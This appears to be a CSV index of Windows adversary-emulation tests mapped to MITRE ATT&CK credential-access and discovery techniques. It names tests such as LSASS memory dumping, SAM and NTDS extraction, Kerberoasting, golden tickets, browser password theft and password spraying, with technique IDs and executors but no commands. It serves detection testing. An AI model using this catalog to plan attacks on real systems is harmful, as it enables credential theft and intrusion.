credential-access,T1056.001,Input Capture: Keylogging,1,Input Capture,d9b633ca-8efb-45e6-b838-70f595c6ae26,powershell
credential-access,T1110.001,Brute Force: Password Guessing,1,Brute Force Credentials of single Active Directory domain users via SMB,09480053-2f98-4854-be6e-71ae5f672224,command_prompt
credential-access,T1110.001,Brute Force: Password Guessing,2,Brute Force Credentials of single Active Directory domain user via LDAP against domain controller (NTLM or Kerberos),c2969434-672b-4ec8-8df0-bbb91f40e250,powershell
credential-access,T1110.001,Brute Force: Password Guessing,6,Password Brute User using Kerbrute Tool,59dbeb1a-79a7-4c2a-baf4-46d0f4c761c4,powershell
credential-access,T1003,OS Credential Dumping,1,Gsecdump,96345bfc-8ae7-4b6a-80b7-223200f24ef9,command_prompt
credential-access,T1003,OS Credential Dumping,2,Credential Dumping with NPPSpy,9e2173c0-ba26-4cdf-b0ed-8c54b27e3ad6,powershell
credential-access,T1003,OS Credential Dumping,3,Dump svchost.exe to gather RDP credentials,d400090a-d8ca-4be0-982e-c70598a23de9,powershell
credential-access,T1003,OS Credential Dumping,4,Retrieve Microsoft IIS Service Account Credentials Using AppCmd (using list),6c7a4fd3-5b0b-4b30-a93e-39411b25d889,powershell
credential-access,T1003,OS Credential Dumping,5,Retrieve Microsoft IIS Service Account Credentials Using AppCmd (using config),42510244-5019-48fa-a0e5-66c3b76e6049,powershell
credential-access,T1003,OS Credential Dumping,6,Dump Credential Manager using keymgr.dll and rundll32.exe,84113186-ed3c-4d0d-8a3c-8980c86c1f4a,powershell
credential-access,T1539,Steal Web Session Cookie,1,Steal Firefox Cookies (Windows),4b437357-f4e9-4c84-9fa6-9bcee6f826aa,powershell
credential-access,T1539,Steal Web Session Cookie,2,Steal Chrome Cookies (Windows),26a6b840-4943-4965-8df5-ef1f9a282440,powershell
credential-access,T1003.002,OS Credential Dumping: Security Account Manager,1,"Registry dump of SAM, creds, and secrets",5c2571d0-1572-416d-9676-812e64ca9f44,command_prompt
credential-access,T1003.002,OS Credential Dumping: Security Account Manager,2,Registry parse with pypykatz,a96872b2-cbf3-46cf-8eb4-27e8c0e85263,command_prompt
credential-access,T1003.002,OS Credential Dumping: Security Account Manager,3,esentutl.exe SAM copy,a90c2f4d-6726-444e-99d2-a00cd7c20480,command_prompt
credential-access,T1003.002,OS Credential Dumping: Security Account Manager,4,PowerDump Hashes and Usernames from Registry,804f28fc-68fc-40da-b5a2-e9d0bce5c193,powershell
credential-access,T1003.002,OS Credential Dumping: Security Account Manager,5,dump volume shadow copy hives with certutil,eeb9751a-d598-42d3-b11c-c122d9c3f6c7,command_prompt
credential-access,T1003.002,OS Credential Dumping: Security Account Manager,6,dump volume shadow copy hives with System.IO.File,9d77fed7-05f8-476e-a81b-8ff0472c64d0,powershell
credential-access,T1003.002,OS Credential Dumping: Security Account Manager,7,WinPwn - Loot local Credentials - Dump SAM-File for NTLM Hashes,0c0f5f06-166a-4f4d-bb4a-719df9a01dbb,powershell
credential-access,T1110.002,Brute Force: Password Cracking,1,Password Cracking with Hashcat,6d27df5d-69d4-4c91-bc33-5983ffe91692,command_prompt
credential-access,T1003.004,OS Credential Dumping: LSA Secrets,1,Dumping LSA Secrets,55295ab0-a703-433b-9ca4-ae13807de12f,command_prompt
credential-access,T1040,Network Sniffing,3,Packet Capture Windows Command Prompt,a5b2f6a0-24b4-493e-9590-c699f75723ca,command_prompt
credential-access,T1040,Network Sniffing,4,Windows Internal Packet Capture,b5656f67-d67f-4de8-8e62-b5581630f528,command_prompt
credential-access,T1040,Network Sniffing,5,Windows Internal pktmon capture,c67ba807-f48b-446e-b955-e4928cd1bf91,command_prompt
credential-access,T1040,Network Sniffing,6,Windows Internal pktmon set filter,855fb8b4-b8ab-4785-ae77-09f5df7bff55,command_prompt
credential-access,T1552.002,Unsecured Credentials: Credentials in Registry,1,Enumeration for Credentials in Registry,b6ec082c-7384-46b3-a111-9a9b8b14e5e7,command_prompt
credential-access,T1552.002,Unsecured Credentials: Credentials in Registry,2,Enumeration for PuTTY Credentials in Registry,af197fd7-e868-448e-9bd5-05d1bcd9d9e5,command_prompt
credential-access,T1556.002,Modify Authentication Process: Password Filter DLL,1,Install and Register Password Filter DLL,a7961770-beb5-4134-9674-83d7e1fa865c,powershell
credential-access,T1558.004,Steal or Forge Kerberos Tickets: AS-REP Roasting,1,Rubeus asreproast,615bd568-2859-41b5-9aed-61f6a88e48dd,powershell
credential-access,T1558.004,Steal or Forge Kerberos Tickets: AS-REP Roasting,2,Get-DomainUser with PowerView,d6139549-7b72-4e48-9ea1-324fc9bdf88a,powershell
credential-access,T1558.004,Steal or Forge Kerberos Tickets: AS-REP Roasting,3,WinPwn - PowerSharpPack - Kerberoasting Using Rubeus,8c385f88-4d47-4c9a-814d-93d9deec8c71,powershell
credential-access,T1555,Credentials from Password Stores,1,Extract Windows Credential Manager via VBA,234f9b7c-b53d-4f32-897b-b880a6c9ea7b,powershell
credential-access,T1555,Credentials from Password Stores,2,Dump credentials from Windows Credential Manager With PowerShell [windows Credentials],c89becbe-1758-4e7d-a0f4-97d2188a23e3,powershell
credential-access,T1555,Credentials from Password Stores,3,Dump credentials from Windows Credential Manager With PowerShell [web Credentials],8fd5a296-6772-4766-9991-ff4e92af7240,powershell
credential-access,T1555,Credentials from Password Stores,4,Enumerate credentials from Windows Credential Manager using vaultcmd.exe [Windows Credentials],36753ded-e5c4-4eb5-bc3c-e8fba236878d,powershell
credential-access,T1555,Credentials from Password Stores,5,Enumerate credentials from Windows Credential Manager using vaultcmd.exe [Web Credentials],bc071188-459f-44d5-901a-f8f2625b2d2e,powershell
credential-access,T1555,Credentials from Password Stores,6,WinPwn - Loot local Credentials - lazagne,079ee2e9-6f16-47ca-a635-14efcd994118,powershell
credential-access,T1555,Credentials from Password Stores,7,WinPwn - Loot local Credentials - Wifi Credentials,afe369c2-b42e-447f-98a3-fb1f4e2b8552,powershell
credential-access,T1555,Credentials from Password Stores,8,WinPwn - Loot local Credentials - Decrypt Teamviewer Passwords,db965264-3117-4bad-b7b7-2523b7856b92,powershell
credential-access,T1555.003,Credentials from Password Stores: Credentials from Web Browsers,1,Run Chrome-password Collector,8c05b133-d438-47ca-a630-19cc464c4622,powershell
credential-access,T1555.003,Credentials from Password Stores: Credentials from Web Browsers,3,LaZagne - Credentials from Browser,9a2915b3-3954-4cce-8c76-00fbf4dbd014,command_prompt
credential-access,T1555.003,Credentials from Password Stores: Credentials from Web Browsers,4,Simulating access to Chrome Login Data,3d111226-d09a-4911-8715-fe11664f960d,powershell
credential-access,T1555.003,Credentials from Password Stores: Credentials from Web Browsers,5,Simulating access to Opera Login Data,28498c17-57e4-495a-b0be-cc1e36de408b,powershell
credential-access,T1555.003,Credentials from Password Stores: Credentials from Web Browsers,6,Simulating access to Windows Firefox Login Data,eb8da98a-2e16-4551-b3dd-83de49baa14c,powershell
credential-access,T1555.003,Credentials from Password Stores: Credentials from Web Browsers,7,Simulating access to Windows Edge Login Data,a6a5ec26-a2d1-4109-9d35-58b867689329,powershell
credential-access,T1555.003,Credentials from Password Stores: Credentials from Web Browsers,8,Decrypt Mozilla Passwords with Firepwd.py,dc9cd677-c70f-4df5-bd1c-f114af3c2381,powershell
credential-access,T1555.003,Credentials from Password Stores: Credentials from Web Browsers,10,Stage Popular Credential Files for Exfiltration,f543635c-1705-42c3-b180-efd6dc6e7ee7,powershell
credential-access,T1555.003,Credentials from Password Stores: Credentials from Web Browsers,11,WinPwn - BrowserPwn,764ea176-fb71-494c-90ea-72e9d85dce76,powershell
credential-access,T1555.003,Credentials from Password Stores: Credentials from Web Browsers,12,WinPwn - Loot local Credentials - mimi-kittenz,ec1d0b37-f659-4186-869f-31a554891611,powershell
credential-access,T1555.003,Credentials from Password Stores: Credentials from Web Browsers,13,WinPwn - PowerSharpPack - Sharpweb for Browser Credentials,e5e3d639-6ea8-4408-9ecd-d5a286268ca0,powershell
credential-access,T1555.003,Credentials from Password Stores: Credentials from Web Browsers,15,WebBrowserPassView - Credentials from Browser,e359627f-2d90-4320-ba5e-b0f878155bbe,powershell
credential-access,T1555.003,Credentials from Password Stores: Credentials from Web Browsers,16,BrowserStealer (Chrome / Firefox / Microsoft Edge),6f2c5c87-a4d5-4898-9bd1-47a55ecaf1dd,powershell
credential-access,T1552.004,Unsecured Credentials: Private Keys,1,Private Keys,520ce462-7ca7-441e-b5a5-f8347f632696,command_prompt
credential-access,T1552.004,Unsecured Credentials: Private Keys,6,ADFS token signing and encryption certificates theft - Local,78e95057-d429-4e66-8f82-0f060c1ac96f,powershell
credential-access,T1552.004,Unsecured Credentials: Private Keys,7,ADFS token signing and encryption certificates theft - Remote,cab413d8-9e4a-4b8d-9b84-c985bd73a442,powershell
credential-access,T1557.001,Adversary-in-the-Middle: LLMNR/NBT-NS Poisoning and SMB Relay,1,LLMNR Poisoning with Inveigh (PowerShell),deecd55f-afe0-4a62-9fba-4d1ba2deb321,powershell
credential-access,T1003.001,OS Credential Dumping: LSASS Memory,1,Dump LSASS.exe Memory using ProcDump,0be2230c-9ab3-4ac2-8826-3199b9a0ebf8,command_prompt
credential-access,T1003.001,OS Credential Dumping: LSASS Memory,2,Dump LSASS.exe Memory using comsvcs.dll,2536dee2-12fb-459a-8c37-971844fa73be,powershell
credential-access,T1003.001,OS Credential Dumping: LSASS Memory,3,Dump LSASS.exe Memory using direct system calls and API unhooking,7ae7102c-a099-45c8-b985-4c7a2d05790d,command_prompt
credential-access,T1003.001,OS Credential Dumping: LSASS Memory,4,Dump LSASS.exe Memory using NanoDump,dddd4aca-bbed-46f0-984d-e4c5971c51ea,command_prompt
credential-access,T1003.001,OS Credential Dumping: LSASS Memory,5,Dump LSASS.exe Memory using Windows Task Manager,dea6c349-f1c6-44f3-87a1-1ed33a59a607,manual
credential-access,T1003.001,OS Credential Dumping: LSASS Memory,6,Offline Credential Theft With Mimikatz,453acf13-1dbd-47d7-b28a-172ce9228023,command_prompt
credential-access,T1003.001,OS Credential Dumping: LSASS Memory,7,LSASS read with pypykatz,c37bc535-5c62-4195-9cc3-0517673171d8,command_prompt
credential-access,T1003.001,OS Credential Dumping: LSASS Memory,8,Dump LSASS.exe Memory using Out-Minidump.ps1,6502c8f0-b775-4dbd-9193-1298f56b6781,powershell
credential-access,T1003.001,OS Credential Dumping: LSASS Memory,9,Create Mini Dump of LSASS.exe using ProcDump,7cede33f-0acd-44ef-9774-15511300b24b,command_prompt
credential-access,T1003.001,OS Credential Dumping: LSASS Memory,10,Powershell Mimikatz,66fb0bc1-3c3f-47e9-a298-550ecfefacbc,powershell
credential-access,T1003.001,OS Credential Dumping: LSASS Memory,11,Dump LSASS with .Net 5 createdump.exe,9d0072c8-7cca-45c4-bd14-f852cfa35cf0,powershell
credential-access,T1003.001,OS Credential Dumping: LSASS Memory,12,Dump LSASS.exe using imported Microsoft DLLs,86fc3f40-237f-4701-b155-81c01c48d697,powershell
credential-access,T1110.003,Brute Force: Password Spraying,1,Password Spray all Domain Users,90bc2e54-6c84-47a5-9439-0a2a92b4b175,command_prompt
credential-access,T1110.003,Brute Force: Password Spraying,2,Password Spray (DomainPasswordSpray),263ae743-515f-4786-ac7d-41ef3a0d4b2b,powershell
credential-access,T1110.003,Brute Force: Password Spraying,3,Password spray all Active Directory domain users with a single password via LDAP against domain controller (NTLM or Kerberos),f14d956a-5b6e-4a93-847f-0c415142f07d,powershell
credential-access,T1110.003,Brute Force: Password Spraying,5,WinPwn - DomainPasswordSpray Attacks,5ccf4bbd-7bf6-43fc-83ac-d9e38aff1d82,powershell
credential-access,T1110.003,Brute Force: Password Spraying,6,Password Spray Invoke-DomainPasswordSpray Light,b15bc9a5-a4f3-4879-9304-ea0011ace63a,powershell
credential-access,T1110.003,Brute Force: Password Spraying,8,Password Spray using Kerbrute Tool,c6f25ec3-6475-47a9-b75d-09ac593c5ecb,powershell
credential-access,T1003.005,OS Credential Dumping: Cached Domain Credentials,1,Cached Credential Dump via Cmdkey,56506854-89d6-46a3-9804-b7fde90791f9,command_prompt
credential-access,T1558.001,Steal or Forge Kerberos Tickets: Golden Ticket,1,Crafting Active Directory golden tickets with mimikatz,9726592a-dabc-4d4d-81cd-44070008b3af,powershell
credential-access,T1558.001,Steal or Forge Kerberos Tickets: Golden Ticket,2,Crafting Active Directory golden tickets with Rubeus,e42d33cd-205c-4acf-ab59-a9f38f6bad9c,powershell
credential-access,T1552.001,Unsecured Credentials: Credentials In Files,3,Extracting passwords with findstr,0e56bf29-ff49-4ea5-9af4-3b81283fd513,powershell
credential-access,T1552.001,Unsecured Credentials: Credentials In Files,4,Access unattend.xml,367d4004-5fc0-446d-823f-960c74ae52c3,command_prompt
credential-access,T1552.001,Unsecured Credentials: Credentials In Files,6,WinPwn - sensitivefiles,114dd4e3-8d1c-4ea7-bb8d-8d8f6aca21f0,powershell
credential-access,T1552.001,Unsecured Credentials: Credentials In Files,7,WinPwn - Snaffler,fdd0c913-714b-4c13-b40f-1824d6c015f2,powershell
credential-access,T1552.001,Unsecured Credentials: Credentials In Files,8,WinPwn - powershellsensitive,75f66e03-37d3-4704-9520-3210efbe33ce,powershell
credential-access,T1552.001,Unsecured Credentials: Credentials In Files,9,WinPwn - passhunt,00e3e3c7-6c3c-455e-bd4b-461c7f0e7797,powershell
credential-access,T1552.001,Unsecured Credentials: Credentials In Files,10,WinPwn - SessionGopher,c9dc9de3-f961-4284-bd2d-f959c9f9fda5,powershell
credential-access,T1552.001,Unsecured Credentials: Credentials In Files,11,"WinPwn - Loot local Credentials - AWS, Microsoft Azure, and Google Compute credentials",aaa87b0e-5232-4649-ae5c-f1724a4b2798,powershell
credential-access,T1552.006,Unsecured Credentials: Group Policy Preferences,1,GPP Passwords (findstr),870fe8fb-5e23-4f5f-b89d-dd7fe26f3b5f,command_prompt
credential-access,T1552.006,Unsecured Credentials: Group Policy Preferences,2,GPP Passwords (Get-GPPPassword),e9584f82-322c-474a-b831-940fd8b4455c,powershell
credential-access,T1056.002,Input Capture: GUI Input Capture,2,PowerShell - Prompt User for Password,2b162bfd-0928-4d4c-9ec3-4d9f88374b52,powershell
credential-access,T1110.004,Brute Force: Credential Stuffing,3,Brute Force:Credential Stuffing using Kerbrute Tool,4852c630-87a9-409b-bb5e-5dc12c9ebcde,powershell
credential-access,T1187,Forced Authentication,1,PetitPotam,485ce873-2e65-4706-9c7e-ae3ab9e14213,powershell
credential-access,T1187,Forced Authentication,2,WinPwn - PowerSharpPack - Retrieving NTLM Hashes without Touching LSASS,7f06b25c-799e-40f1-89db-999c9cc84317,powershell
credential-access,T1558.002,Steal or Forge Kerberos Tickets: Silver Ticket,1,Crafting Active Directory silver tickets with mimikatz,385e59aa-113e-4711-84d9-f637aef01f2c,powershell
credential-access,T1555.004,Credentials from Password Stores: Windows Credential Manager,1,Access Saved Credentials via VaultCmd,9c2dd36d-5c8b-4b29-8d72-a11b0d5d7439,command_prompt
credential-access,T1555.004,Credentials from Password Stores: Windows Credential Manager,2,WinPwn - Loot local Credentials - Invoke-WCMDump,fa714db1-63dd-479e-a58e-7b2b52ca5997,powershell
credential-access,T1003.003,OS Credential Dumping: NTDS,1,Create Volume Shadow Copy with vssadmin,dcebead7-6c28-4b4b-bf3c-79deb1b1fc7f,command_prompt
credential-access,T1003.003,OS Credential Dumping: NTDS,2,Copy NTDS.dit from Volume Shadow Copy,c6237146-9ea6-4711-85c9-c56d263a6b03,command_prompt
credential-access,T1003.003,OS Credential Dumping: NTDS,3,Dump Active Directory Database with NTDSUtil,2364e33d-ceab-4641-8468-bfb1d7cc2723,command_prompt
credential-access,T1003.003,OS Credential Dumping: NTDS,4,Create Volume Shadow Copy with WMI,224f7de0-8f0a-4a94-b5d8-989b036c86da,command_prompt
credential-access,T1003.003,OS Credential Dumping: NTDS,5,Create Volume Shadow Copy remotely with WMI,d893459f-71f0-484d-9808-ec83b2b64226,command_prompt
credential-access,T1003.003,OS Credential Dumping: NTDS,6,Create Volume Shadow Copy remotely (WMI) with esentutl,21c7bf80-3e8b-40fa-8f9d-f5b194ff2865,command_prompt
credential-access,T1003.003,OS Credential Dumping: NTDS,7,Create Volume Shadow Copy with Powershell,542bb97e-da53-436b-8e43-e0a7d31a6c24,powershell
credential-access,T1003.003,OS Credential Dumping: NTDS,8,Create Symlink to Volume Shadow Copy,21748c28-2793-4284-9e07-d6d028b66702,command_prompt
credential-access,T1558.003,Steal or Forge Kerberos Tickets: Kerberoasting,1,Request for service tickets,3f987809-3681-43c8-bcd8-b3ff3a28533a,powershell
credential-access,T1558.003,Steal or Forge Kerberos Tickets: Kerberoasting,2,Rubeus kerberoast,14625569-6def-4497-99ac-8e7817105b55,powershell
credential-access,T1558.003,Steal or Forge Kerberos Tickets: Kerberoasting,3,Extract all accounts in use as SPN using setspn,e6f4affd-d826-4871-9a62-6c9004b8fe06,command_prompt
credential-access,T1558.003,Steal or Forge Kerberos Tickets: Kerberoasting,4,Request A Single Ticket via PowerShell,988539bc-2ed7-4e62-aec6-7c5cf6680863,powershell
credential-access,T1558.003,Steal or Forge Kerberos Tickets: Kerberoasting,5,Request All Tickets via PowerShell,902f4ed2-1aba-4133-90f2-cff6d299d6da,powershell
credential-access,T1558.003,Steal or Forge Kerberos Tickets: Kerberoasting,6,WinPwn - Kerberoasting,78d10e20-c874-45f2-a9df-6fea0120ec27,powershell
credential-access,T1558.003,Steal or Forge Kerberos Tickets: Kerberoasting,7,WinPwn - PowerSharpPack - Kerberoasting Using Rubeus,29094950-2c96-4cbd-b5e4-f7c65079678f,powershell
credential-access,T1003.006,OS Credential Dumping: DCSync,1,DCSync (Active Directory),129efd28-8497-4c87-a1b0-73b9a870ca3e,command_prompt
credential-access,T1003.006,OS Credential Dumping: DCSync,2,Run DSInternals Get-ADReplAccount,a0bced08-3fc5-4d8b-93b7-e8344739376e,powershell
credential-access,T1056.004,Input Capture: Credential API Hooking,1,Hook PowerShell TLS Encrypt/Decrypt Messages,de1934ea-1fbf-425b-8795-65fb27dd7e33,powershell
discovery,T1033,System Owner/User Discovery,1,System Owner/User Discovery,4c4959bf-addf-4b4a-be86-8d09cc1857aa,command_prompt
discovery,T1033,System Owner/User Discovery,3,Find computers where user has session - Stealth mode (PowerView),29857f27-a36f-4f7e-8084-4557cd6207ca,powershell
discovery,T1033,System Owner/User Discovery,4,User Discovery With Env Vars PowerShell Script,dcb6cdee-1fb0-4087-8bf8-88cfd136ba51,powershell
discovery,T1033,System Owner/User Discovery,5,GetCurrent User with PowerShell Script,1392bd0f-5d5a-429e-81d9-eb9d4d4d5b3b,powershell
discovery,T1615,Group Policy Discovery,1,Display group policy information via gpresult,0976990f-53b1-4d3f-a185-6df5be429d3b,command_prompt
discovery,T1615,Group Policy Discovery,2,Get-DomainGPO to display group policy information via PowerView,4e524c4e-0e02-49aa-8df5-93f3f7959b9f,powershell
discovery,T1615,Group Policy Discovery,3,WinPwn - GPOAudit,bc25c04b-841e-4965-855f-d1f645d7ab73,powershell
discovery,T1615,Group Policy Discovery,4,WinPwn - GPORemoteAccessPolicy,7230d01a-0a72-4bd5-9d7f-c6d472bc6a59,powershell
discovery,T1615,Group Policy Discovery,5,MSFT Get-GPO Cmdlet,52778a8f-a10b-41a4-9eae-52ddb74072bf,powershell
discovery,T1087.002,Account Discovery: Domain Account,1,Enumerate all accounts (Domain),6fbc9e68-5ad7-444a-bd11-8bf3136c477e,command_prompt
discovery,T1087.002,Account Discovery: Domain Account,2,Enumerate all accounts via PowerShell (Domain),8b8a6449-be98-4f42-afd2-dedddc7453b2,powershell
discovery,T1087.002,Account Discovery: Domain Account,3,Enumerate logged on users via CMD (Domain),161dcd85-d014-4f5e-900c-d3eaae82a0f7,command_prompt
discovery,T1087.002,Account Discovery: Domain Account,4,Automated AD Recon (ADRecon),95018438-454a-468c-a0fa-59c800149b59,powershell
discovery,T1087.002,Account Discovery: Domain Account,5,Adfind -Listing password policy,736b4f53-f400-4c22-855d-1a6b5a551600,command_prompt
discovery,T1087.002,Account Discovery: Domain Account,6,Adfind - Enumerate Active Directory Admins,b95fd967-4e62-4109-b48d-265edfd28c3a,command_prompt
discovery,T1087.002,Account Discovery: Domain Account,7,Adfind - Enumerate Active Directory User Objects,e1ec8d20-509a-4b9a-b820-06c9b2da8eb7,command_prompt
discovery,T1087.002,Account Discovery: Domain Account,8,Adfind - Enumerate Active Directory Exchange AD Objects,5e2938fb-f919-47b6-8b29-2f6a1f718e99,command_prompt
discovery,T1087.002,Account Discovery: Domain Account,9,Enumerate Default Domain Admin Details (Domain),c70ab9fd-19e2-4e02-a83c-9cfa8eaa8fef,command_prompt
discovery,T1087.002,Account Discovery: Domain Account,10,Enumerate Active Directory for Unconstrained Delegation,46f8dbe9-22a5-4770-8513-66119c5be63b,powershell
discovery,T1087.002,Account Discovery: Domain Account,11,Get-DomainUser with PowerView,93662494-5ed7-4454-a04c-8c8372808ac2,powershell
discovery,T1087.002,Account Discovery: Domain Account,12,Enumerate Active Directory Users with ADSISearcher,02e8be5a-3065-4e54-8cc8-a14d138834d3,powershell
discovery,T1087.002,Account Discovery: Domain Account,13,Enumerate Linked Policies In ADSISearcher Discovery,7ab0205a-34e4-4a44-9b04-e1541d1a57be,powershell
discovery,T1087.002,Account Discovery: Domain Account,14,Enumerate Root Domain linked policies Discovery,00c652e2-0750-4ca6-82ff-0204684a6fe4,powershell
discovery,T1087.002,Account Discovery: Domain Account,15,WinPwn - generaldomaininfo,ce483c35-c74b-45a7-a670-631d1e69db3d,powershell
discovery,T1087.002,Account Discovery: Domain Account,16,Kerbrute - userenum,f450461c-18d1-4452-9f0d-2c42c3f08624,powershell
discovery,T1087.001,Account Discovery: Local Account,8,Enumerate all accounts on Windows (Local),80887bec-5a9b-4efc-a81d-f83eb2eb32ab,command_prompt
discovery,T1087.001,Account Discovery: Local Account,9,Enumerate all accounts via PowerShell (Local),ae4b6361-b5f8-46cb-a3f9-9cf108ccfe7b,powershell
discovery,T1087.001,Account Discovery: Local Account,10,Enumerate logged on users via CMD (Local),a138085e-bfe5-46ba-a242-74a6fb884af3,command_prompt
discovery,T1497.001,Virtualization/Sandbox Evasion: System Checks,2,Detect Virtualization Environment (Windows),502a7dc4-9d6f-4d28-abf2-f0e84692562d,powershell
discovery,T1497.001,Virtualization/Sandbox Evasion: System Checks,4,Detect Virtualization Environment via WMI Manufacturer/Model Listing (Windows),4a41089a-48e0-47aa-82cb-5b81a463bc78,powershell
discovery,T1069.002,Permission Groups Discovery: Domain Groups,1,Basic Permission Groups Discovery Windows (Domain),dd66d77d-8998-48c0-8024-df263dc2ce5d,command_prompt
discovery,T1069.002,Permission Groups Discovery: Domain Groups,2,Permission Groups Discovery PowerShell (Domain),6d5d8c96-3d2a-4da9-9d6d-9a9d341899a7,powershell
discovery,T1069.002,Permission Groups Discovery: Domain Groups,3,Elevated group enumeration using net group (Domain),0afb5163-8181-432e-9405-4322710c0c37,command_prompt
discovery,T1069.002,Permission Groups Discovery: Domain Groups,4,Find machines where user has local admin access (PowerView),a2d71eee-a353-4232-9f86-54f4288dd8c1,powershell
discovery,T1069.002,Permission Groups Discovery: Domain Groups,5,Find local admins on all machines in domain (PowerView),a5f0d9f8-d3c9-46c0-8378-846ddd6b1cbd,powershell
discovery,T1069.002,Permission Groups Discovery: Domain Groups,6,Find Local Admins via Group Policy (PowerView),64fdb43b-5259-467a-b000-1b02c00e510a,powershell
discovery,T1069.002,Permission Groups Discovery: Domain Groups,7,Enumerate Users Not Requiring Pre Auth (ASRepRoast),870ba71e-6858-4f6d-895c-bb6237f6121b,powershell
discovery,T1069.002,Permission Groups Discovery: Domain Groups,8,Adfind - Query Active Directory Groups,48ddc687-82af-40b7-8472-ff1e742e8274,command_prompt
discovery,T1069.002,Permission Groups Discovery: Domain Groups,9,Enumerate Active Directory Groups with Get-AdGroup,3d1fcd2a-e51c-4cbe-8d84-9a843bad8dc8,powershell
discovery,T1069.002,Permission Groups Discovery: Domain Groups,10,Enumerate Active Directory Groups with ADSISearcher,9f4e344b-8434-41b3-85b1-d38f29d148d0,powershell
discovery,T1069.002,Permission Groups Discovery: Domain Groups,11,Get-ADUser Enumeration using UserAccountControl flags (AS-REP Roasting),43fa81fb-34bb-4b5f-867b-03c7dbe0e3d8,powershell
discovery,T1069.002,Permission Groups Discovery: Domain Groups,12,Get-DomainGroupMember with PowerView,46352f40-f283-4fe5-b56d-d9a71750e145,powershell
discovery,T1069.002,Permission Groups Discovery: Domain Groups,13,Get-DomainGroup with PowerView,5a8a181c-2c8e-478d-a943-549305a01230,powershell
discovery,T1007,System Service Discovery,1,System Service Discovery,89676ba1-b1f8-47ee-b940-2e1a113ebc71,command_prompt
discovery,T1007,System Service Discovery,2,System Service Discovery - net.exe,5f864a3f-8ce9-45c0-812c-bdf7d8aeacc3,command_prompt
discovery,T1040,Network Sniffing,3,Packet Capture Windows Command Prompt,a5b2f6a0-24b4-493e-9590-c699f75723ca,command_prompt
discovery,T1040,Network Sniffing,4,Windows Internal Packet Capture,b5656f67-d67f-4de8-8e62-b5581630f528,command_prompt
discovery,T1040,Network Sniffing,5,Windows Internal pktmon capture,c67ba807-f48b-446e-b955-e4928cd1bf91,command_prompt
discovery,T1040,Network Sniffing,6,Windows Internal pktmon set filter,855fb8b4-b8ab-4785-ae77-09f5df7bff55,command_prompt
discovery,T1135,Network Share Discovery,3,Network Share Discovery command prompt,20f1097d-81c1-405c-8380-32174d493bbb,command_prompt
discovery,T1135,Network Share Discovery,4,Network Share Discovery PowerShell,1b0814d1-bb24-402d-9615-1b20c50733fb,powershell
discovery,T1135,Network Share Discovery,5,View available share drives,ab39a04f-0c93-4540-9ff2-83f862c385ae,command_prompt
discovery,T1135,Network Share Discovery,6,Share Discovery with PowerView,b1636f0a-ba82-435c-b699-0d78794d8bfd,powershell
discovery,T1135,Network Share Discovery,7,PowerView ShareFinder,d07e4cc1-98ae-447e-9d31-36cb430d28c4,powershell
discovery,T1135,Network Share Discovery,8,WinPwn - shareenumeration,987901d1-5b87-4558-a6d9-cffcabc638b8,powershell
discovery,T1120,Peripheral Device Discovery,1,Win32_PnPEntity Hardware Inventory,2cb4dbf2-2dca-4597-8678-4d39d207a3a5,powershell
discovery,T1120,Peripheral Device Discovery,2,WinPwn - printercheck,cb6e76ca-861e-4a7f-be08-564caa3e6f75,powershell
discovery,T1082,System Information Discovery,1,System Information Discovery,66703791-c902-4560-8770-42b8a91f7667,command_prompt
discovery,T1082,System Information Discovery,6,Hostname Discovery (Windows),85cfbf23-4a1e-4342-8792-007e004b975f,command_prompt
discovery,T1082,System Information Discovery,8,Windows MachineGUID Discovery,224b4daf-db44-404e-b6b2-f4d1f0126ef8,command_prompt
discovery,T1082,System Information Discovery,9,Griffon Recon,69bd4abe-8759-49a6-8d21-0f15822d6370,powershell
discovery,T1082,System Information Discovery,10,Environment variables discovery on windows,f400d1c0-1804-4ff8-b069-ef5ddd2adbf3,command_prompt
discovery,T1082,System Information Discovery,13,WinPwn - winPEAS,eea1d918-825e-47dd-acc2-814d6c58c0e1,powershell
discovery,T1082,System Information Discovery,14,WinPwn - itm4nprivesc,3d256a2f-5e57-4003-8eb6-64d91b1da7ce,powershell
discovery,T1082,System Information Discovery,15,WinPwn - Powersploits privesc checks,345cb8e4-d2de-4011-a580-619cf5a9e2d7,powershell
discovery,T1082,System Information Discovery,16,WinPwn - General privesc checks,5b6f39a2-6ec7-4783-a5fd-2c54a55409ed,powershell
discovery,T1082,System Information Discovery,17,WinPwn - GeneralRecon,7804659b-fdbf-4cf6-b06a-c03e758590e8,powershell
discovery,T1082,System Information Discovery,18,WinPwn - Morerecon,3278b2f6-f733-4875-9ef4-bfed34244f0a,powershell
discovery,T1082,System Information Discovery,19,WinPwn - RBCD-Check,dec6a0d8-bcaf-4c22-9d48-2aee59fb692b,powershell
discovery,T1082,System Information Discovery,20,WinPwn - PowerSharpPack - Watson searching for missing windows patches,07b18a66-6304-47d2-bad0-ef421eb2e107,powershell
discovery,T1082,System Information Discovery,21,WinPwn - PowerSharpPack - Sharpup checking common Privesc vectors,efb79454-1101-4224-a4d0-30c9c8b29ffc,powershell
discovery,T1082,System Information Discovery,22,WinPwn - PowerSharpPack - Seatbelt,5c16ceb4-ba3a-43d7-b848-a13c1f216d95,powershell
discovery,T1010,Application Window Discovery,1,List Process Main Windows - C# .NET,fe94a1c3-3e22-4dc9-9fdf-3a8bdbc10dc4,command_prompt
discovery,T1217,Browser Bookmark Discovery,4,List Google Chrome / Opera Bookmarks on Windows with powershell,faab755e-4299-48ec-8202-fc7885eb6545,powershell
discovery,T1217,Browser Bookmark Discovery,5,List Google Chrome / Edge Chromium Bookmarks on Windows with command prompt,76f71e2f-480e-4bed-b61e-398fe17499d5,command_prompt
discovery,T1217,Browser Bookmark Discovery,6,List Mozilla Firefox bookmarks on Windows with command prompt,4312cdbc-79fc-4a9c-becc-53d49c734bc5,command_prompt
discovery,T1217,Browser Bookmark Discovery,7,List Internet Explorer Bookmarks using the command prompt,727dbcdb-e495-4ab1-a6c4-80c7f77aef85,command_prompt
discovery,T1016,System Network Configuration Discovery,1,System Network Configuration Discovery on Windows,970ab6a1-0157-4f3f-9a73-ec4166754b23,command_prompt
discovery,T1016,System Network Configuration Discovery,2,List Windows Firewall Rules,038263cb-00f4-4b0a-98ae-0696c67e1752,command_prompt
discovery,T1016,System Network Configuration Discovery,4,System Network Configuration Discovery (TrickBot Style),dafaf052-5508-402d-bf77-51e0700c02e2,command_prompt
discovery,T1016,System Network Configuration Discovery,5,List Open Egress Ports,4b467538-f102-491d-ace7-ed487b853bf5,powershell
discovery,T1016,System Network Configuration Discovery,6,Adfind - Enumerate Active Directory Subnet Objects,9bb45dd7-c466-4f93-83a1-be30e56033ee,command_prompt
